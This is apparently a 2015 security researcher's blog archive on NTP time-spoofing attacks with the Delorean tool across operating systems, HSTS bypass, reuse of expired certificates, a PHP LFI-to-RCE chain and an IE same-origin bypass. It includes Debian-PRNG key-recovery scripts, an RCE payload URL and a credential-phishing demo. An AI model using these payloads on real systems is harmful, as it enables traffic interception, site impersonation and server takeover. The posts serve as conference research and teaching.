Wednesday, 4 November 2015

Attacking the Public Key Infrastructure

Have a look to other posts of this serie:

[7] Other Attacks
[8] Helper tools

Disclaimer: All this information has been obtained from empirical tests and in a specific period of time, so they could have changed.

Disclaimer (2): In this post I talk about certificates, SSL keys, etc. Please note that I could talk about (for example) "the certificates's private key" because it's the way I usually speak, but probably it isn't the most correct term. I should talk about "the private key of the certificate's public key", but I think it's easier to understand if we simplify this. Any way, if something sounds confusing, just drop me an email or comment and I'll try to clarify it.

From the number of attacks that I tried using Deloran, this was my favorite one. While I was thinking about what could go wrong when the clock can be tampered, SSL certificates expiration dates came to my mind.

As you probably know, a SSL certificate is valid if:
  • It was issued by a trusted certification authority (CA) or by an Intermediate CA that was issued by a trusted CA.
  • Common name matches the server's hostname (wildcards can be used).
  • Current date is between the "Not valid before" and "Not valid after" dates.
When a SSL certificate expire, we need to get a new one, and the older ones are usually forgotten, because they're invalid (3rd case). However, with Delorean this isn't completely true, since we could tamper the internal clock and make a computer to believe that an old certificate is valid.


But we can't attack all the old certificates in the world using Delorean. We need to find certificates with the following conditions:
  • We need to reconstruct the old certificate chain: This isn't a problem, since CA certificates have long validity periods, so perhaps the current certificate chain also works with the old certificate, and if not, looking for the "Issuer name" in the Internet usually works.
  • Root CA (starts the certificate chain) has to be a trusted OS/Browser CA: If the root CA has expired and remove from the browser's certificates database, victim's browser won't be able to validate the certificate chain. This is only a problem for root CAs. Any other Intermediate CA could be expired and that wouldn't avoid our attack.
  • We need to find the old host certificate: This is harder than it seems. It's not such an easy task. Let's talk about this a few lines below.
  • We need to be able to get the host certificate's private key: This is the only one private key that we need to know. That's why we're interested in old certificates, because we could find much easier ways to get the private key than in modern ones. Let's talk about this a few lines below as well.
So... we said that we need to get old SSL host certificates. Where could I find them? Unfortunately, I did't grab SSL certificates 10 years ago, so I need to find somebody else in the Internet that did it. I spent a lot of time looking for this kind of database (the oldest the better, of course) and the better and oldest resource that I found was The SSL Observatory from EFF. They crawled the Internet in 2010 and stored a huge database with all the SSL certificates that they found.


Now that we have an old SSL certificates database, we can start looking for certificates that we think we could break and get it's private key. For example, something that came to my mind was the FREAK attack. As a part of this attack, they cracked RSA-512 keys in a few hours, using a big Amazon EC2 cluster, so we could do something similar if we find RSA-512 certificates in our database.

Unfortunately, the most interesting targets (Google, Facebook, etc) didn't use RSA-512 in 2010. Maybe if we had an older database... Anyway, I was able to found some interesting certificates and some funny ones, such as a Disney site (not the main site).

Disclaimer (3): When I do a Delorean demo using a website, I'm NOT attacking the website. The website is NOT vulnerable. I'm attacking a vulnerable client, that is my own testing machine, so I'm attacking myself, not the website.

I'm not going to specify step by step how I crack the RSA-512 certificate, because I would be a post (or some of them) itself, and because It was the fist time that I did it, so you can find much more useful information in the Internet [1][2][3][4]. At the end of the day, I had four EC2 machines running 3 days (as far as I remember) and It was around $150 in total.


Once you have factored the old RSA key, you have the two prime numbers that were used to create the public and private keys, so you just need to do it again (private-from-pq.c) to get the private key. Let's see if it works or not.


It works! The certificate chain is valid again and we have the private key, so we can cheat the browser and impersonate the website. Cool!

As far as I have read (I'm not an expert in this field), Governments and other organizations with enough resources could crack RSA-1024 in a reasonable time. This is even more interesting than my demo, because RSA-512 is now banned from most modern browsers, so they would reject the certificate chain. I did this demo using an RSA-512 certificate because I don't have at this moment enough resources to crack RSA-1024 and because It's exactly the same process, so if we can do this for RSA-512 in a slightly old browser, we definitely could do it for RSA-1024 if we had enough cracking power.

This is not the only one old weakness that we can use:
But there's something that probably came to your mind. What about certificate revocation? This isn't a problem with cracked certificates, because they never were revoked, but hacked certificates, heartbleeded, debian prng, etc ... all those certificates should have been revoked after generating a new one.


A Certificate Revocation List (CRL) is the database where all the revoked certificates are stored. Browsers download them (or request information via online services) and check if a given certificate is revoked or not, If it is, they reject the communication even if all the certificate chain is valid.

When I was facing this problem, the question that came to my mind was: Do those CRLs store ALL the revoked certificates? From the beginning of time? This would make this files HUGE, which is something that could affect performance. Well, I can't be 100% sure about this, but I did some quick tests to check if CAs purge their CRLs when revoked certificates are not valid because of their validity period.


I focused only in one simple test. I opened several well-known websites in my browser and I got their issuer certificate. Then I downloaded the referenced CRL and I looked for big difference between the date when the certificate was issued and the date of the oldest revoked certificate. If the certificate was issued in 2008,  and the first certificate in the CRL was revoked in 2012, and the second one in 2014... that's pretty weird. My humble opinion is that those CAs are purging expired certificates because they will be invalid anyway. That's 100% true, but it lets us to use our attack against those certificates, even if they should be revoked.

Online Certificate Status Protocol (OCSP) doesn't really help (it's even easier), because most browsers are configured in order to accept certificates if they can't validate them, so an attacker just needs to drop OCSP connections. More information HERE.

From the list above, I looked for certificates that were generated using the old Debian PRNG bug. The problem was that this happened in 2008 and the SSL database that we have is from 2010, so most interesting websites changed their certificates before 2010.

Looking around the Internet I found CodeFromThe70s. They developed a Firefox extension that detected certificated generated by the Debian PRNG bug. Detections were sent to them so they have a nice blacklist in their website. I used that list to find a certificate that I could use to test if it's still revoked or not.

Next step was to get the private key. This wasn't as fast as I thought, because the pre-generated list published by HD Moore was for SSH keys only, so I needed to generate my own for HTTPS. What I did was to use the original patched "getpid.so" library and "ubunturoot" chrooted environment (original link was broken, so I downloaded it from here), and I developed a couple of shell scripts that just generate all possible SSL key pairs and check if it's the one I'm looking for:

$ cat keyfind.sh
#!/bin/bash

TARGET=0123456789abcdef0123456789abcdef

for PID in `seq 1 32768`
do
    chroot . /generate.sh $PID &>/dev/null

    openssl rsa -in private.pem -noout -modulus | openssl md5 | awk '{print $2}' | grep "$TARGET"
    if [ $? -eq 0 ]
    then
        cp private.pem found.pem
        echo "FOUND!"
        exit
    fi
    rm -f private.pem
    echo $PID   
done


$ generate.sh
#!/bin/bash

export MAGICPID=$1
export LD_PRELOAD=/getpid.so
/usr/bin/openssl genrsa -out private.pem 1024 &>/dev/null


It took a few hours but I was able to get this private key as well. Maybe it wasn't the most efficient way, but it worked for me. The resulting demo is following:


My DEF CON talk (August 7th, 2015) is online, so you can have a look as well. I presented this as well in Spanish in RootedCON (March 2015) and NavajaNegra/ConectaCON (October 2015), but their haven't published the videos yet:

Monday, 2 November 2015

Attacking HTTP Strict Transport Security

Have a look to other posts of this serie:

[6] Attacking the Public Key Infrastructure
[7] Other Attacks
[8] Helper tools

Disclaimer: All this information has been obtained from empirical tests and in a specific period of time, so they could have changed.

In the last few posts we have reviewed how time synchronization works in different operating systems and how we could change the clock using Delorean in each of them. However, we haven't seen any practical attack. What can we do by tampering a computer's clock?

I started this research because I was doing a MitM demo, using SSLStrip, and it didn't work when I tried to visit GMail and other well-known websites. That was weird, because I had done the same demo many times in the past. Debugging the problem I discovered an HTTP header called "Strict-Transport-Security", something that had never seen before.


HTTP Strict Transport Security (aka HSTS) is a security protection that was released in 2012 and, despite is not widely used in the Internet yet, most well-known providers use it at this moment. The server part is really simple, a webserver just needs to set up the "Strict-Transport-Security" header setting the desired policy using the "max-age" and "includeSubdomains" parameters. In the example above, the web server sets a policy in the browser saying "ey! it doesn't matter what happen, please connect to me always using HTTPS for the following 3153600 seconds".

The hardest part in the HSTS feature is in the browser part. A browser needs to read this header and do all the necessary actions to ensure that it follows the policy. Most browsers support HSTS despite IE didn't support it until June 9th 2015. While I was delivering my talk in DEF CON (August 2015), an attendant from the first row correct me when I said "IE doesn't support HSTS". He was right about that, because I'm not an IE user and I tested it for the last time a few months before the talk. I asked him if this was something recent but he told me that "six months ago" (around February) which isn't exactly what I have found documentd. Anyway, It supports HSTS now.


In addition, Google and Mozilla created a Preloaded HSTS list for their browsers (later the idea was used in other browsers). A preloaded list is a list of well-known providers (google, twitter, facebook, paypal, etc) where HSTS is "enforced by default". The goal of this preloaded list is to avoid the security gap when a user have just installed his browser or cleaned his cache, or when he visits a website for the first time, before any HSTS policy has ben set.


Despite information from Google or Mozilla seem to talk about the HSTS preloaded list as a static list, the real truth is that preloaded entries are treated exactly the same than dynamic entries. When a browser is installed or its cache is cleaned, all entries in this list are added as dynamic entries using a default value (10 weeks) and they're updated in the same way than dynamic entries are so, in real life, it doesn't make a difference for a Delorean. 


The only browser that I have found in my research which works in a different way is Apple Safari. It stores a .plist a preloaded list and it forces always HSTS in those hosts. It doesn't matter the local clock.

Since we know that HSTS policy will avoid us from intercepting the first HTTP connection and, as a consequence, from using SSLStrip (or intercepting the communication in any other way), in the amount of seconds specified in the "max-age" parameter, our attack against HSTS is based on updating the local clock in order to make HSTS cache to expire. When there isn't any entry in the HSTS cache, a browser will work as usual, so when typing hostnames such as "mail.google.com" it will connect using HTTP before being redirected to HTTPS.


My talk in BlackHat Europe last year was based in this attack, and it was published several months ago, so you can have a look if my accent doesn't hurt you (as a comment in youtube said) ;)

Friday, 30 October 2015

Microsoft Time Synchronization

Have a look to other posts of this serie:

[5] Attacking HTTP Strict Transport Security
[6] Attacking the Public Key Infrastructure
[7] Other Attacks
[8] Helper tools

Of course, I couldn't finish my examples without talking about Microsoft. From the desktop OS vendor that I have tested, Microsoft has the most robust one in terms of security. It works in a different way for standalone computers than in domain members, so let's cover both circumstances:

In a standalone Windows box, time synchronization takes place each 7 days (Sundays at 1-2am or so) so the only one option to intercept an NTP request is to be there on Sunday or Monday, whenever the victim boots the computer for the first time after the synchronization time. In addition, Windows has a clock drift limitation of 15 hours, so we can't change the clock more than 15 hours on each synchronization, which is a real problem for most attacks that we will see in the following posts.

The 15 hours value is not a harcoded value, it is stored in the registry, in a couple of keys called "MaxPosPhaseCorrection" and "MaxNegPhaseCorrection", and they change in different systems, for example, in a Windows 7/8 is 15 hours but in a Windows Server 2012 is 48 hours, and in older servers is different as well. It could also change when some changes happen in the box, for example when a box become a domain member.


In combination, both controls make Windows boxes pretty secure in terms of time synchronization. However, if any of both are changed by the user, there are some attack vectors that could be used. For example, there are many tutorials in the internet explaining how to change the time synchronization scheduled task, because they think (and probably they're right) that once a week is not enough for a good clock accuracy.


So, under this circumstance, a new attack vector came to my mind. What happen if the user configure his system to synchronize the time more often than the maximum clock drift allowed? The answer is than an attacker could intercept that NTP request and change the clock just a few seconds before the next scheduled time synchronization, then intercept the following NTP requst and do the same, and again, and again, and again until he reach the desired time. I called this attack "Time Skimming", because it's a similar idea than a stone skimming in a lake, and it's implemented in Delorean:



There's another way to force time synchronization, but it requires some kind of social engineering. When the user manually request a time synchronization using the "Internet Time Settings", but it's not as easy as in Mac OS X, since it takes several clicks.

Domain members work in a different way. The Max[Pos|Neg]PhaseCorrction value is set to 0xFFFFFFFF which means "accept any clock drift". That is a risk, but they include a packet signature in order to authenticate the source of the response:


They use the NTP standard in a creative way. Key ID should be a value that identify which key should be used to sign the response. In a regular NTP request it should be 1 or 2, depending on the number of keys available. However, what Microsoft did was use this to identify the computers username in the active directory that is requesting the time synchronization. For example, if we have a KeyID 0x5e040000 we need to change its endianess and then we have 0x0000045e. The first bit of this is a key selector (0 or 1), and the rest is the Relative ID (RID) for the computer.


As you probably know, both computers and users are objects in active directory. Computers are a special kind of users. They set a password for this user when they join the domain, and those passwords are changed in a regular basis. A Domain Controller store the last two known hashed passwords, so the key selector that we mentioned before identify this.

/* Sign the NTP response with the unicodePwd */
MD5Init(&ctx);
MD5Update(&ctx, nt_hash->hash, sizeof(nt_hash->hash));
MD5Update(&ctx, sign_request.packet_to_sign.data, sign_request.packet_to_sign.length);
MD5Final(signed_reply.signed_packet.data + sign_request.packet_to_sign.length + 4, &ctx);


Response packets are signed using MD5 ( md5(hashed_password+response_body) ), which is not the most robust hashing algorithm in the world, but I couldn't find a working attack for such a small message, so at this point I think a Microsoft domain time synchronization is the most robust that I have seen in my research.

Wednesday, 28 October 2015

Fedora / Ubuntu Time Synchronization

Have a look to other posts of this serie:

[4] Microsoft Time Synchronization
[5] Attacking HTTP Strict Transport Security
[6] Attacking the Public Key Infrastructure
[7] Other Attacks
[8] Helper tools

Yesterday we were talking about how time synchronization works in Mac OS X, and how it is different for pre-Mavericks versions and the most modern ones. Today, we are having a look to GNU/Linux. Of course, we have a big amount of Linux flavors available, and we couldn't review all of them, but I chose the two favors that I think are most extended in desktop users (Ubuntu and Fedora), since they would be the target for this attacks.

Disclaimer: All this information has been obtained from empirical tests and in a specific period of time, so they could have changed.

Ubuntu Linux is the only one reviewed system that doesn't synchronize the time in a regular basis, so it isn't just a matter of waiting the necessary amount of time and intercept the NTP request. In Ubuntu, time synchronization is done each time than a network interface comes up (and, of course, when the system boots up). This is easy to see if we have a look at the script files that Ubuntu runs when that happens:

$ ls /etc/network/if-up.d/
000resolvconf  avahi-daemon  ntpdate  wpasupplicant
avahi-autoipd   ethtool             upstart

There isn't any restriction in terms of a big date change, so we could easily intercept this request and set the computer's clock using Delorean. There are two possible scenarios: Intercept at boot time or when the computer connects to a network, or just detach the computer from the network (deauth on a Wifi, for example) and wait for the next connection.

On the other hand, Fedora Linux use a similar approach than Mac OS X. In previous versions, it just synchronized the time each minute, without any security restrictions, so it was easy and fast to use Delorean in order to tamper the system clock:

$ tcpdump -i eth0 -nn src port 123
12:43:50.614191 IP 192.168.1.101.123 > 89.248.106.98.123: NTPv3, Client, length 48
12:44:55.696390 IP 192.168.1.101.123 > 213.194.159.3.123: NTPv3, Client, length 48
12:45:59.034059 IP 192.168.1.101.123 > 89.248.106.98.123: NTPv3, Client, length 48

At some point they changed the synchronization approach. At this moment, there is a daemon called "chrony" which works in a similar way than "pacemaker" in Mac OS X. However, Chrony are configured in a more secure way than Pacemaker. By default, it doesn't accept big date changes. It only accepts them in the first three tries from the last reboot, so we can still use a Delorean attack at boot time or if we can crash the chrony service.

We're probably going too fast, because we haven't talked about HSTS and how it could be bypassed using time synchronization attacks, but let me show you an example of this attack against an Ubuntu Linux box:

Tuesday, 27 October 2015

Mac OS X Time Synchronization

Have a look to other posts of this serie:

[4] Microsoft Time Synchronization
[5] Attacking HTTP Strict Transport Security
[6] Attacking the Public Key Infrastructure
[7] Other Attacks
[8] Helper tools

Last week we showed how Delorean works, and how we could use it in order to tamper NTP responses. However, time synchronization work slightly different between OS vendors.

Disclaimer: All this information has been obtained from empirical tests and in a specific period of time, so they could have changed.

Pre-Mavericks Mac OS X use a simple time synchronization approach. An ntpd daemon is running and time is synchronized each 9 minutes. Any restriction or security configuration are applied in this daemon, so an attacker could use Delorean and change the internal clock easily.

$ tcpdump -i eth0 -nn src port 123
09:02:18.166708 IP 192.168.1.100.123 > 17.72.148.53.123: NTPv4, Client, length 48
09:11:20.059792 IP 192.168.1.100.123 > 17.72.148.53.123: NTPv4, Client, length 48
09:20:17.951361 IP 192.168.1.100.123 > 17.72.148.53.123: NTPv4, Client, length 48


However, Apple changed the time synchronization in Mavericks. NTPd is still running but it doesn't change the clock directly. The time drift is stored in /var/db/ntp.drift , and there is another service, called "pacemaker" that should check this file and change the clock if needed.
This new service has several benefits. For example, It adapts the amount of NTP requests to the powers state (plugged or battery). Another important difference is that clock changes are not applied in a single step. The clock speeds up or slows down in order to correct the date but avoiding big time steps. It doesn't implement any other security feature so it can be intercepted using Delorean as well.

Despite it shouldn't be a problem, we have found that NTPd wasn't working properly in modern versions of Mac OS X, so time synchronization was not working at all. There are some people arguing in the Internet about this. Does it mean that modern Mac OS X are not vulnerable to a Delorean attack? The answer is NO. Let's have a look to the /usr/libexec/ntpd-wrapper script:


As you can see above, Mac OS X runs a sntp (simple NTP) command at boot, before running the NTPd daemon. This sntp binary is not affected by the same bug, so we could intercept this synchronization and run a Delorean attack when a Mac OS X boots up.

There is still an additional way to exploit this weak time synchronization in Mac OS X. When a user opens the "Date & Time Preferences" menu, the operating system automatically synchronize the time without user's knowledge, so we could use Delorean in this scenario as well.


In the following posts, we will see how we could exploit this in order to intercept SSL communications, as we presented in DEF CON recently.

Wednesday, 21 October 2015

NTP MitM Attack using a Delorean

Around one and a half year ago, I started a research about how computers synchronize their internal clocks, and how this could be used in order to attack well-known protocols and services running in Operating Systems. As a result, I have presented my findings in several security conferences such as BlackHat Europe 2014, RootedCON 2015 (Spanish), DEF CON 23 and Navaja Negra / ConectaCON 2015 (Spanish).


Today, October 21th 2015, it's the date when Marty McFly went to the future in the second part of the amazing Back to the Future saga, so I can't think in a better date to start releasing all the details about this research.

[4] Microsoft Time Synchronization
[5] Attacking HTTP Strict Transport Security
[6] Attacking the Public Key Infrastructure
[7] Other Attacks
[8] Helper tools

As we will see in the upcoming posts, all the OS vendors that I have tested use the Network Time Protocol (NTP) in order to keep their internal clock accurate, which is very important for some authentication protocols and other stuff. Most of them don't deploy this service in a secure way, making it vulnerable to Man-in-the-Middle attacks.

In order to exploit this issue, I developed a tool called DELOREAN. Delorean is an NTP server written in python, open source and available from GitHub (contributions are welcomed). I borrowed a few lines of code from kimifly's ntpserver and, of course, all the credits to him have been included.

What makes Delorean different and useful for us is that we can configure its flags in order to make it work in a different way than a regular NTP server. Basically, we can configure it in order to send fake responses, similar to the Metasploit's fakedns module.

$ ./delorean.py -h
Usage: delorean.py [options]

Options:
-h, --help show this help message and exit
-i INTERFACE, --interface=INTERFACE Listening interface
-p PORT, --port=PORT Listening port
-n, --nobanner Not show Delorean banner
-s STEP, --force-step=STEP Force the time step: 3m (minutes), 4d (days), 1M (month)
-d DATE, --force-date=DATE Force the date: YYYY-MM-DD hh:mm[:ss]
-x, --random-date Use random date each time


We have the typical interface (-i) and port (-p) flags, that help us to bind the service exactly where we want. The -n flag only hides the super-cool Delorean banner :)

                                    _._                                          
                               _.-="_-         _                                 
                          _.-="   _-          | ||"""""""---._______     __..    
              ___.===""""-.______-,,,,,,,,,,,,`-''----" """""       """""  __'   
       __.--""     __        ,'                   o \           __        [__|   
  __-""=======.--""  ""--.=================================.--""  ""--.=======:  
 ]       [w] : /        \ : |========================|    : /        \ :  [w] :  
 V___________:|          |: |========================|    :|          |:   _-"   
  V__________: \        / :_|=======================/_____: \        / :__-"     
  -----------'  ""____""  `-------------------------------'  ""____""  

We can use Delorean in several modes, but we are going to focus in the most useful ones. There are some other attacks that weren't really interesting after developing them, but they are still in the code. Perhaps I will remove them in the future, sine they require scapy and some dependencies.

Since it's too soon yet to talk about how OS synchronize, we will test how Delorean works using the command line tool "ntpdate":

$ ntpdate -q 192.168.1.2
server 192.168.1.2, stratum 2, offset 97372804.086845, delay 0.02699
20 Oct 06:05:45 ntpdate[881]: step time server 192.168.1.2 offset 97372804.086845 sec


By default (no flags), Delorean responses a date that matches the same week and month day than the current date, but at least 1000 days in the future. This was useful for the HSTS bypass as we will see in upcoming posts.

# ./delorean.py -n
[19:44:42] Sent to 192.168.10.113:123 - Going to the future! 2018-08-31 19:44
[19:45:18] Sent to 192.168.10.113:123 - Going to the future! 2018-08-31 19:45


We can set a relative jump from the current date using the step flag (-s). Relative jumps can be defined as 10d (ten days in the future), -2y (two years in the past), etc:

# ./delorean.py -s 10d -n
[19:46:09] Sent to 192.168.10.113:123 - Going to the future! 2015-08-10 19:46
[19:47:19] Sent to 192.168.10.113:123 - Going to the future! 2015-08-10 19:47


We can also set a specific date, and Delorean would answer always the same date:

# ./delorean.py -d ‘2020-08-01 21:15’ -n
[19:49:50] Sent to 127.0.0.1:48473 - Going to the future! 2020-08-01 21:15
[19:50:10] Sent to 127.0.0.1:52406 - Going to the future! 2020-08-01 21:15


There are an additional attack called "Skimming Attack" that is useful only on certain configurations, but we will go in depth with it when we will talk about Microsoft synchronization, despite it could be useful in other platforms.

Tuesday, 8 September 2015

SANS SEC-660: "Advanced Penetration Testing, Exploit Writing and Ethical Hacking" in Madrid

As you probably know, I have been quite involved with the SANS Institute since 2010, when I was a SANS Mentor for the first time. Currently I'm a SANS Community Instructor and I have been teaching the SEC-560: "Network Penetration Testing, Exploits and E
thical Hacking" several times in Spain.


Next November in Madrid (Spain), you will have the opportunity to step up your Penetration Testing skills to other fields and techniques not covered at SEC-560 course. As you can read in the SANS Institute web site: SEC-660 "Advanced Penetration Testing, Exploit Writing and Ethical Hacking" is designed as a logical progression point for those who have completed SANS SEC-560, or for those with existing penetration testing experience. The topics covered in this course include attacks against network access control (NAC), virtual local area network (VLAN) manipulation, breaking Windows and Linux restricted environments (kiosk-like), cryptographic attacks, fuzzing, exploit writing and bypassing the most common OS protection such as ASLR, DEP, Canaries, etc , and much more.


Despite not being a course focused in exploit-writing such as SEC-760, the exploiting part of SEC-660 (two days) is the perfect approach for those Pentesters that want a in-depth view of how processes and memory are managed in Windows and Linux, and how to exploit certain common flaws that could be really useful when there isn't a public exploit available or when it doesn't work properly in our specific environment.

In addition, even being used to the "SANS-style", SEC-660 is one of the most hands-on course that I have ever seen. There are dozens of real-works attacks that we will covered in detail that you could probably found in your upcoming penetration tests.

Interested? Book the following dates: November 2nd-7th in Madrid. You just need to drop me an email at jselvi{-at-}pentester.es and CC sans{-at-}one-esecurity.com and we will explain you how to procede. Remember that the course materials are in English, but the clases will be delivered in Spanish.

Shall we dance Pentest?

More information about SEC-660 HERE.
More information about other course and prices HERE.

Friday, 20 February 2015

From Case-Insensitive to RCE

This post was written by The DarkRaver. He's a close friend and one of the best skilled security professionals that I have ever met. He's also known by publishing tools such as dirb or sqlibf that I strongly recommend.

Go ahead with his post:

------------------------------------------------------

Some time ago, I was doing a webapp penetration testing when I found something really interesting. The application was coded in PHP and it relied on some commercial components. Soon I found lots of XSS and SQLi vulnerable forms, but we won't focus on that in this post.

Suddenly, I realised that requesting the same page in uppercase or lowercase changed its behavior. The webserver was based on Apache and Linux (case sensitive) but the files seem to be hosted in a cases insensitive filesystem (maybe a NAS share?), so when I requested page.php it responded as expected, but when I requested page.PHP its source code was shown.


That vulnerability allowed to review the commercial application's source code, where I found several potentially dangerous functions such as "include()" and "include_once()" that could be vulnerable. No other dangerous functions such as "system()", "open()" or "file_get_contents()" were found.

A few minutes later I could confirm that at least one of those "include_once()" functions was vulnerable to LFI and exploitable. However, only files with .js extension could be loaded.


I tried several ways to bypass this protection, such as null byte, long paths, etc, but nothing seemed to work. So... we're tied to that. How we could upload or create a .js file in the local filesystem?

The upload forms didn't allow that kind of extensions and we weren't able to create files inside the server. Or... maybe we were? What about the following piece of code?


It was a feature that allowed to cache JavaScript files on disk! But... How could we inject custom content in those cached files?

An in-depth look showed that some JavaScripts were generated from a template and one of them included some user controled parameters. That sounds great!


Even better, the injectable parameter was the same that was vulnerable to LFI, so we could find a way to exploit both vulnerabilities at the same time.

JavaScript files were stored in a path like that: "/cache/".$offv.$theme.$lang.$type.$name.".js" , where $offv was the user provided input and the other parts could be easy guessed looking at the source code. So... the exploit string should be as follows:

http://www.app.com/plugin/minjs.php?
offending_var=../../cache/<?phpinfo();?>defaultes-lacoredefault

However, I got a "500 - Internal Server Error". What the hell??? Something was terribly crashing. How we could fix it? I tried some other PHP functions such as "system()", "file_get_contents()" and "phpversion()" but most of them crashed in the same way.

Wait, what if the exploit works but it crashes at some point after that? what if we try to "exit()" the execution?

http://www.app.com/plugin/minjs.php?
offending_var=../../cache/<?system(“id”);exit();?>defaultes-lacoredefault


It works! Finally I had Remote Code Execution in the server, and everything began with a small source code leak caused by a case-insensitive filesystem. Small things sometimes cause big troubles.

Thursday, 5 February 2015

An IE Same Origin Policy Bypass story

A couple of days ago I was reading my feeds when suddenly a headline caught my attention: "Serious bug in fully patched Internet Explorer put user credentials at risk". A same-origin-policy bypass in Internet Explorer had been released. This is a really critical vulnerability, because SOP provides isolation between different websites inside our browser, and avoid evil sites to get access to other sites and modify its content and so on.

I have been taking a look for the last few hours and it definitely works. The provided PoC works but perhaps isn't the most practical approach. As far as I know, details of this vulnerability haven't been published apart from the PoC itself, so let's have a look to the PoC. I have prepared my own PoC, just to see if I could use this vulnerability for more evil purposes.


At first sight, the vulnerability seems to be a race condition or similar. There are two iframes, the first one loads a dynamic webpage, for example 1.php. Its source code wasn't published with the PoC but it simply waits for a few seconds and then it redirects to the same url than the second iframe.

Both iframes load a webpage in the target website. It's important to find a webpage that could be loaded inside an iframe because if not the vulnerability isn't exploitable. Providers such as Google, Facebook, etc usually configure their sites with the "X-Frame-Options" header in order to avoid ClickJacking attacks.


However, a single page with no "X-Frame-Options" in the domain is enough for us, and this is not as difficult to find as it seems. There are two well known resources that aren't protected in most websites: robots.txt (the one used by the original author) and favicon.ico (I used that one because it looks better for a practical attack).

There is a function called "go()" that makes the real exploitation. It's difficult to read so let me decode it for you.


Here is where interesting things happen. There are some "alert" and "eval" calls that seem to be important. I couldn't figure out why, but if you change them it won't work. This is the tricky part in this vulnerability.

It gets the second iframe that we were talking before and store it in a variable "x". Then it waits a few seconds (1 second in the code) and shows an alert message. As I previously said, that alert seem to be important so we can remove it, but we can use a message that won't warn the user that something bad is just about to happen. After that, when the first iframe has already changed from my evil domain to the target domain (because of 1.php) a piece of javascript and HTML code is injected in that second iframe. We shouldn't be able to to that, because it's a different domain, but we are. The same origin policy has been bypassed.

Let's see what a victim would see:


Some countries have specific laws about cookies and a warning message is needed at most websites, so users are used to click "OK".


When I injected the javascript and HTML code in the iframe, I used a Google button. It isn't the most beautiful blog but well... It looks like a real blog :)


The Google authentication page is opened. Everything looks fine but I have changed the form action using the injected javascript code.


Done! A really cool vulnerability. I can't wait for more details about the vulnerability. Let's see if in a few days we can know why "alert", "eval" and "setTimeout" are sometimes as important as they are.